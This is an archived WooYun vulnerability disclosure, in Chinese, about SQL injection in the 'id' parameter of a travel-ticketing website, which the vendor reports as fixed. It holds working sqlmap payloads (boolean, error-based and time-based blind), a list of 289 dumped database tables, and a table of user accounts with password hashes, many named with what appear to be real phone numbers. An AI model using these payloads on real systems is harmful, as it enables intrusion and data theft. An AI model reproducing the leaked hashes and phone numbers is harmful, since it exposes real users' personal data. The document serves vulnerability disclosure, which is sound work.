乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-02: 细节已通知厂商并且等待厂商处理中 2015-10-08: 厂商已经确认,细节仅向厂商公开 2015-10-08: 厂商已经修复漏洞并主动公开,细节向公众公开
别的不会就会扫注入。。
http://m.zyql.cn/?m=android/scenic.scenicDetail&id=64
Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: m=android/scenic.scenicDetail&id=64 AND 1812=1812 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: m=android/scenic.scenicDetail&id=64 AND (SELECT 3290 FROM(SELECT COUNT(*),CONCAT(0x3a7267763a,(SELECT (CASE WHEN (3290=3290) THEN 1 ELSE 0 END)),0x3a7365633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: m=android/scenic.scenicDetail&id=64 AND SLEEP(5)---
[289 tables]+----------------------------------------+| api_publish || btob_api_push || btob_btoc_scenic_ticket_reserve_config || btob_consume || btob_finance || btob_level || btob_member || btob_member_authority || btob_member_log || btob_money_log || btob_msg_log || btob_notice || btob_order || btob_order_log || btob_order_reserve || btob_order_reserve_cashback || btob_order_return || btob_pay || btob_pay_log || btob_print_log || btob_push_task_list || btob_reverse || btob_scenic || btob_scenic_ticket || btob_scenic_type || btob_verify_push_zyql || ecs_region || ecs_scenic || ecs_scenic_admin || ecs_scenic_comment || ecs_scenic_order || ecs_scenic_order_ticket || ecs_scenic_ticket || ecs_sms_logs || ecs_users || el_brand || el_hotel || el_hoteldetail || el_hotelorder || el_hotelorderrate || el_image || el_poi || el_poi_copy || el_room || el_tmporderinfo || jd_ad || jd_admin || jd_adminlog || jd_admintype || jd_article || jd_article_class || jd_chain || jd_chainnum || jd_city || jd_flink || jd_hotel || jd_hotel_api || jd_keywords || jd_layout || jd_module || jd_ncity || jd_purview || jd_rewrite || jd_sysconfig || jd_usergroup || my_activity || my_activity_comment || my_admin || my_admin_log || my_appmoney || my_area_blacklist || my_article || my_authorize || my_bonus_send || my_bonus_type || my_comment || my_comment_impression || my_delta || my_dict_roomprice || my_elong_blacklist || my_finance || my_finance_log || my_hotel || my_level || my_line || my_line_comment || my_member || my_module || my_msg_log || my_msg_times || my_nopay || my_order_activity || my_order_line || my_order_log_zypw || my_order_room || my_order_rural || my_order_scenic || my_order_scenic_813 || my_order_scenic_828 || my_order_scenic_i || my_order_scenic_zhj || my_order_scenic_zhj_0901 || my_order_scenic_zhj_copy || my_pay || my_photo || my_publish || my_question || my_raiders || my_reply || my_room || my_rural || my_rural_admin || my_rural_comment || my_rural_price || my_rural_stock || my_rural_ticket || my_rural_type || my_sale || my_scenic || my_scenic_admin || my_scenic_comment || my_scenic_price || my_scenic_stock || my_scenic_ticket || my_scenic_type || my_seckill_order_scenic || my_seckill_order_scenic_log || my_seckill_ticket || my_service || my_special_price || my_stock || my_trace || my_type || t_system_failedlogins || t_system_log || t_system_memberfields || t_system_members || t_system_onlinetime || t_system_report || t_system_robot || t_system_robot_ip || t_system_robot_log || t_system_role || t_system_role_action || t_system_role_module || t_system_sessions || t_tttuangou_address || t_tttuangou_api_apps || t_tttuangou_api_protocol || t_tttuangou_api_session || t_tttuangou_article || t_tttuangou_attrs || t_tttuangou_attrs_cat || t_tttuangou_attrs_order || t_tttuangou_catalog || t_tttuangou_city || t_tttuangou_city_place || t_tttuangou_comments || t_tttuangou_express || t_tttuangou_express_area || t_tttuangou_express_cdp || t_tttuangou_express_corp || t_tttuangou_express_printer_log || t_tttuangou_finder || t_tttuangou_metas || t_tttuangou_order || t_tttuangou_order_clog || t_tttuangou_paylog || t_tttuangou_payment || t_tttuangou_prize_phone || t_tttuangou_prize_ticket || t_tttuangou_prize_ticket_win || t_tttuangou_product || t_tttuangou_push_log || t_tttuangou_push_queue || t_tttuangou_push_template || t_tttuangou_question || t_tttuangou_recharge_card || t_tttuangou_recharge_order || t_tttuangou_regions || t_tttuangou_reports || t_tttuangou_seller || t_tttuangou_service || t_tttuangou_subscribe || t_tttuangou_ticket || t_tttuangou_uploads || t_tttuangou_usermoney || t_tttuangou_usermsg || t_tttuangou_zlog || tao_cancel || tao_consume_logs || tao_order || tao_resend || tao_reverse || v9_ad || v9_ad_data || v9_admin || v9_admin_panel || v9_admin_role || v9_admin_role_priv || v9_attachment || v9_attachment_index || v9_badword || v9_block || v9_block_history || v9_block_priv || v9_cache || v9_category || v9_category_priv || v9_collection_content || v9_collection_history || v9_collection_node || v9_collection_program || v9_content_check || v9_copyfrom || v9_datacall || v9_dbsource || v9_download || v9_download_data || v9_downservers || v9_extend_setting || v9_favorite || v9_hits || v9_ipbanned || v9_keylink || v9_keyword || v9_keyword_data || v9_linkage || v9_log || v9_member || v9_member_detail || v9_member_group || v9_member_menu || v9_member_verify || v9_member_vip || v9_menu || v9_model || v9_model_field || v9_module || v9_news || v9_news_data || v9_page || v9_pay_account || v9_pay_payment || v9_pay_spend || v9_picture || v9_picture_data || v9_position || v9_position_data || v9_poster || v9_poster_201402 || v9_poster_201403 || v9_poster_201404 || v9_poster_201406 || v9_poster_201407 || v9_poster_201408 || v9_poster_201409 || v9_poster_201410 || v9_poster_201412 || v9_poster_201505 || v9_poster_201509 || v9_poster_space || v9_queue || v9_release_point || v9_search || v9_search_keyword || v9_session || v9_site || v9_special || v9_special_c_data || v9_special_content || v9_sphinx_counter || v9_sso_admin || v9_sso_applications || v9_sso_members || v9_sso_messagequeue || v9_sso_session || v9_sso_settings || v9_template_bak || v9_times || v9_type || v9_urlrule || v9_video || v9_video_content || v9_video_data || v9_video_store || v9_workflow || v9_zyqlproduct || v9_zyqlproduct_data |+----------------------------------------+
随便读了几个user...
+----------------------------------+-----------------+| password | user_name |+----------------------------------+-----------------+| a3545bd79d31f9a72d3a78690adf73fc | zsd_15692397606 || a35d11c2f995c60b0341a9c777f1ae03 | zsd_13964145843 || a35d11c2f995c60b0341a9c777f1ae03 | zsd_13730971688 || a35e47afa1d3e418e42a24151e0ac4e1 | lizhenq || a35f4223bb8f6c8638dc91d94e9b16f5 | zsd_15605433688 || a35f4223bb8f6c8638dc91d94e9b16f5 | zsd_15550442702 || a35fe7f7fe8217b4369a0af4244d1fca | zsd_13906332915 || a368b0de8b91cfb3f91892fbf1ebd4b2 | zsd_13863520806 || a36adbc35e69b22acbf9f834a0deb286 | zsd_15953797189 || a36b0dcd1e6384abc0e1867860ad3ee3 | zsd_15269992087 || a36b0dcd1e6384abc0e1867860ad3ee3 | zsd_18364112339 || a36b598abb934e4528412e5a2127b931 | zsd_13573368888 || a36e841c5230a79c2102036d2e259848 | zsd_15615316666 || a36e841c5230a79c2102036d2e259848 | zsd_13792174520 || a376033f78e144f494bfc743c0be3330 | zsd_13325091256 || a376802c0811f1b9088828288eb0d3f0 | zsd_13563733690 || a376802c0811f1b9088828288eb0d3f0 | zsd_18643584676 || a3788c8c64fd65c470e23e7534c3ebc8 | zsd_13287720902 || a37e0e39e1495a423b9d86bc058e9c27 | ???? || a381c2c35c9157f6b67fd07d5a200ae1 | zsd_18766944270 || a381c2c35c9157f6b67fd07d5a200ae1 | zsd_18754196080 |+----------------------------------+-----------------+
过滤过滤过滤!
危害等级:中
漏洞Rank:8
确认时间:2015-10-08 11:36
感谢各种 路人甲 。boss第一时间赶到现场,亲自训诫了研发人员,目前研发人员情绪稳定。
2015-10-08:已过滤。并继续审查代码中。
2015-10-08:已修复